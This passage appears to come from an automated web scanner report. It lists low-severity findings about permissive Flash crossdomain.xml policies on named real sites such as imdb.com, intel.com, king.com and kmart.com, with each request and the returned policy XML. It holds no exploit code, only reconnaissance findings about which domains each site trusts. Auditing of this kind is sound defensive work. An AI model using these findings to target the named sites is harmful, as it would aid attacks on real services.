Cache-Control: public, max-age=1800
Date: Sat, 02 Apr 2011 13:41:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.ikea.com" />
   <allow-access-from domain="*.ikea.be" />
   <allow-access-from domain="*.ikea.cz" />
   <allow-access-from domain="*.ikea.dk" />
   <allow-access-from domain="*.ikea.de" />
   <allow-access-from domain="*.ikea.es" />
   <allow-access-from domain="*.ikea.gr" />
   <allow-access-from domain="*.ikea.fr" />
   <allow-access-from domain="*.ikea.is" />
   <allow-access-from domain="*.ikea.com.cy" />
   <allow-access-from domain="*.ikea.hu" />
   <allow-access-from domain="*.ikea.nl" />
   <allow-access-from domain="*.ikea.no" />
   <allow-access-from domain="*.ikea.at" />
   <allow-access-from domain="*.ikea.ru" />
   <allow-access-from domain="*.ikea.pl" />
   <allow-access-from domain="*.ikea.pt" />
   <allow-access-from domain="*.ikea.ro" />
   <allow-access-from domain="*.ikea.ch" />
   <allow-access-from domain="*.ikea.sk" />
   <allow-access-from domain="*.ikea.fi" />
   <allow-access-from domain="*.ikea.se" />
   <allow-access-from domain="*.ikea.ie" />
   <allow-access-from domain="*.ikea.com.tr" />
   <allow-access-from domain="*.ikea.co.uk" />
   <allow-access-from domain="*.ikea.ca" />
   <allow-access-from domain="*.ikea.cn" />
   <allow-access-from domain="*.ikea.com.hk" />
   <allow-access-from domain="*.ikea.jp" />
   <allow-access-from domain="*.ikea.com.my" />
   <allow-access-from domain="*.ikea.com.tw" />
   <allow-access-from domain="*.ikea.com.sg" />
   <allow-access-from domain="*.ikeainfo.com" />
   <allow-access-from domain="*.ikeastampa.it" />
   <allow-access-from domain="*.ikea-family.net" />
   <allow-access-from domain="*.ikea-business.net" />
   <allow-access-from domain="*.business.ikea.com" />
   <allow-access-from domain="*.lebst-du-schon.com" />
   <allow-access-from domain="*.ikeacz.cz" />
   <allow-access-from domain="*.moovii.jp" />
   <allow-access-from domain="*.prototipo.sweb.info" />
   <allow-access-from domain="*.ikeadt.com" />
   <allow-access-from domain="*.gimlet.se" />
   <allow-access-from domain="*.kokokaka.com" />
<allow-access-from domain="*.weareyours.com" />
   <allow-access-from domain="*.ikea-canada.com"/>
   <allow-access-from domain="*.novaloznice.cz" />
<allow-access-from domain="*.novaspalna.sk" />
   <allow-access-from domain="*.ujhaloszoba.hu"/>
   <allow-access-from domain="*.cybercomhosting.com"/>
<allow-access-from domain="*.rebenga.se"/>
<allow-access-from domain="*.ikeagodjul.cz"/>
<allow-access-from domain="*.ikeagodjul.sk"/>
<allow-access-from domain="*.ikeagodjul.hu"/>
...[SNIP]...
7.296. http://www.ilike.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ilike.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ilike.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
P3P: policyref="http://www.ilike.com/p3p.xml", CP="CAO CUR ADM IVAo IVDo CONo OTPo OUR IND UNI NAV ONL INT PRE"
Date: Sat, 02 Apr 2011 12:13:14 GMT
X-App: lv-app82-170:80
Accept-Ranges: bytes
Last-Modified: Mon, 03 Jan 2011 23:38:16 GMT
Content-Length: 1178
Connection: Keep-Alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.ilike.com -->
<cross-domain-policy>
<allow-access-from domain="*.ilike.com" />
...[SNIP]...
<allow-access-from domain="*.google.com" />
...[SNIP]...
<allow-access-from domain="*.gmodules.com" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" />
...[SNIP]...
<allow-access-from domain="*.icast.com" />
<allow-access-from domain="*.gcast.com" />
<allow-access-from domain="*.garageband.com" />
...[SNIP]...
<allow-access-from domain="*.fotodunk.com" />
<allow-access-from domain="local" />
<allow-access-from domain="localhost" />
...[SNIP]...
7.297. http://www.imdb.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imdb.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:57 GMT
Server: Server
Last-Modified: Fri, 01 Apr 2011 05:36:11 GMT
ETag: "20e-49fd4c99968c0"
Accept-Ranges: bytes
Content-Length: 526
Cache-Control: max-age=315360000
Expires: Tue, 30 Mar 2021 12:37:57 GMT
nnCoection: close
Content-Type: text/xml
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.imdb.de" />
<allow-access-from domain="*.imdb.es" />
<allow-access-from domain="*.imdb.it" />
<allow-access-from domain="*.imdb.fr" />
<allow-access-from domain="*.imdb.pt" />
<allow-access-from domain="*.imdb.me" />
<allow-access-from domain="*.media-imdb.com" />
...[SNIP]...
7.298. http://www.indiatimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.indiatimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 10 May 2010 10:00:59 GMT
ETag: "eeb0e4b027f0ca1:633"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=162641
Date: Sat, 02 Apr 2011 14:02:48 GMT
Content-Length: 917
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.indiatimes.com" secure="true" />
<allow-access-from domain="*.timesgroup.com" secure="true" />
<allow-access-from domain="*.timesofindia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.economictimes.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.ethindi.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.etgujarati.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.idiva.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.itimes.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotklix.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.absoluteradio.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="*.absoluteradio.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="*.indiatimes.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
7.299. http://www.infoplease.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infoplease.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.infoplease.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751444430401; path=/; expires=Sun, 01-Apr-12 13:37:24 GMT
Last-Modified: Thu, 28 Oct 2010 21:07:40 GMT
ETag: "1cd-493b3bb70bf00"
Accept-Ranges: bytes
Content-Length: 461
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.infoplease.com" />
<allow-ac
...[SNIP]...
<allow-access-from domain="*.infoplease.info" />
<allow-access-from domain="i.infopls.com" />
<allow-access-from domain="*.familyeducation.com" />
...[SNIP]...
7.300. http://www.intel.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intel.com

Response

HTTP/1.0 200 OK
Content-Length: 290
Content-Type: text/xml
Last-Modified: Tue, 10 Jan 2006 16:04:48 GMT
Accept-Ranges: bytes
ETag: "78bab694ff15c61:431f"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sat, 02 Apr 2011 14:04:59 GMT
Connection: close

...<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.spillinova.com" />
<allow-access-from domain="*.intel.com" />
<allow-access-from domain="*.intel.com/cd/" />
<allow-access-from domain = "intel.speedera.net"/>
...[SNIP]...
7.301. http://www.intuit.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intuit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intuit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:41 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 05:24:24 GMT
Accept-Ranges: bytes
Content-Length: 410
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:39:41 GMT
Vary: Accept-Encoding
P3P: policyref="http://smallbusiness.intuit.com/small-business/privacy/index.jsp",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="*.intuit.com" to-ports="*" />
...[SNIP]...
7.302. http://www.ioffer.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ioffer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ioffer.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:04 GMT
Server: PWS/1.7.1.5
X-Px: ms jfk-agg-n68 ( jfk-agg-n69), ms jfk-agg-n69 ( sjc-ag1-n2), ms sjc-ag1-n2 ( origin)
Cache-Control: private
Content-Length: 214
Content-Type: text/xml
Last-Modified: Sat, 25 Apr 2009 21:28:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ioffer.com" />
</cross-d
...[SNIP]...
7.303. http://www.istockphoto.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.istockphoto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.istockphoto.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Server: BigIP
Content-Length: 286
Date: Sat, 02 Apr 2011 14:16:11 GMT
Connection: close

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="by-cont
...[SNIP]...
<allow-access-from domain="*.istockphoto.com" />
...[SNIP]...
7.304. http://www.itt-tech.edu/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.itt-tech.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.itt-tech.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:29:07 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Last-Modified: Thu, 25 Jun 2009 15:28:29 GMT
ETag: "9974-100-e02f6140"
Accept-Ranges: bytes
Content-Length: 256
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ittesi.com" />
<allow-access-from domain="*.itt-tech.edu" />
...[SNIP]...
7.305. http://www.iwin.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.iwin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.iwin.com

Response

HTTP/1.1 200 OK
ETag: W/"219-1296818118000"
Last-Modified: Fri, 04 Feb 2011 11:15:18 GMT
Content-Type: application/xml
Server: Apache
Content-Length: 219
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 931872643
Age: 0
Via: 1.1 varnish
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.iwin.com" />
<allow-http-request-headers-from domain="*.iwin.com" headers="*"/>
</cro
...[SNIP]...
7.306. http://www.jtv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jtv.com

Response

HTTP/1.0 200 OK
Server: Demandware eCommerce Server
Cache-Control: public;max-age=54515
Expires: Sun, 03 Apr 2011 05:28:27 GMT
Last-Modified: Thu, 31 Mar 2011 17:58:19 GMT
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:19:52 GMT
Content-Length: 332
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="demandware.edgesuite.net" />
<allow-access-from domain="*.jtv.com" />
<allow-access-from domain="*.jewelrytelevision.com" />
...[SNIP]...
7.307. http://www.justin.tv/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.justin.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.justin.tv

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 23:54:55 GMT
Date: Sat, 02 Apr 2011 13:33:28 GMT
Content-Length: 798
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.myspacecdn.com" />
<allow-access-from domain="*.myspace.com" />
<allow-access-from domain="*.justin.tv" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.staging.justin.tv" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="localhost" to-ports="*" />
...[SNIP]...
<allow-access-from domain="bitcast-d.bitgravity.com" />
...[SNIP]...
7.308. http://www.kaboose.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kaboose.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:43 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
Last-Modified: Tue, 17 Jun 2008 20:31:23 GMT
ETag: "f963c-324-44fe2a0a1bcc0"
Accept-Ranges: bytes
Content-Length: 804
Keep-Alive: timeout=5, max=79
Connection: close
Content-Type: application/xml
X-UA-COMPATIBLE: IE=EmulateIE7

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.kaboose.com" />
<allow-access-from domain="funschool.kaboose.com" />
<allow-access-from domain="*.kaboose.ca" />
<allow-access-from domain="*.kidsdomain.com" />
<allow-access-from domain="*.funschool.com" />
<allow-access-from domain="*.zeeks.com" />
<allow-access-from domain="*.zeeks.ca" />
<allow-access-from domain="games.zeeks.com" />

<allow-access-from domain="*.babyzone.com"/>
<allow-access-from domain="*.bounty.com"/>
<allow-access-from domain="games.zeeks.ca" />
<allow-access-from domain="*.kaboosenetwork.com" />
<allow-access-from domain="*.birthdayinabox.com" />
<allow-access-from domain="*.bubbleshare.com" />

<allow-access-from domain="*.pointroll.com" />
...[SNIP]...
7.309. http://www.kbb.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kbb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kbb.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Type: text/xml
Last-Modified: Wed, 23 Mar 2011 15:13:32 GMT
Accept-Ranges: bytes
ETag: "0f629df6ce9cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:24 GMT
Connection: close
Content-Length: 217
Set-Cookie: BIGipServerpool_kbb.com=1964053514.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.brightcove.com" />
</cro
...[SNIP]...
7.310. http://www.kenexa.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kenexa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kenexa.com

Response

HTTP/1.1 200 OK
Content-Length: 324
Content-Type: text/xml
Last-Modified: Thu, 16 Oct 2008 16:15:07 GMT
Accept-Ranges: bytes
ETag: "a259d75aaa2fc91:3be"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:20:08 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.tommyweir.com" />
<allow-access-from domain="*.ceoshift.com" />
<allow-access-from domain="*.theceoshift.com" />
...[SNIP]...
7.311. http://www.king.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.king.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.king.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:44 GMT
Server: Apache
Expires: Sat, 02 Apr 2011 14:05:44 GMT
Content-Length: 9685
Content-Type: text/xml; charset=iso-8859-1
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*.king.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.midasplayer.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.royalgames.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="cash-games.gmx.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="cash.games.web.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="de.midas.games.yahoo.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="esv.rtl.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="esv.rtl.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="fr.midas.games.yahoo.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="games.blip.se" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="games.firstream.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="images.mygame.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.alice.aol.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.at.aol.de " secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.games.co.uk" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.gamesgames.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.it.msn.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.juegos.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="midasplayer.aol.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="midasplayer.onet.pl" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="midasplayer.tiscali.it" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="midasplayer.wanadoo.nl" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="pottipelit.pelikone.fi" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="pottipelit.taukopelit.fi" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="prosieben.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="prosieben.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rtl.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rtl.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rtl2.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rtl2.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="sat1.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="sat1.midasplayer.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="spelhallen.msn.se" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="spiele.wunderweib.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="spray.midasplayer.se" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="turnier.freenet.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="turnier.tvmovie.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="uk.midas.games.yahoo.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.blipgame.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.king-spiele.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.king.de" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.mygame.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.play22.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.royalgames-online.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.royalgames.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.skillgames.co.uk" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.spelduel.nl" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="i1.midasplayer.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="king.pantherssl.com" secure="false" to-ports="*" />
...[SNIP]...
7.312. http://www.kmart.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kmart.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 23 Mar 2011 19:03:42 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:28:09 GMT
Content-Length: 2829
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sears.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.kenmore.com"/>
   <allow-access-from domain="*.media.richrelevance.com"/>
   <allow-access-from domain="*.recs.richrelevance.com"/>
   <allow-access-from domain="*.ecircular.richrelevance.com"/>
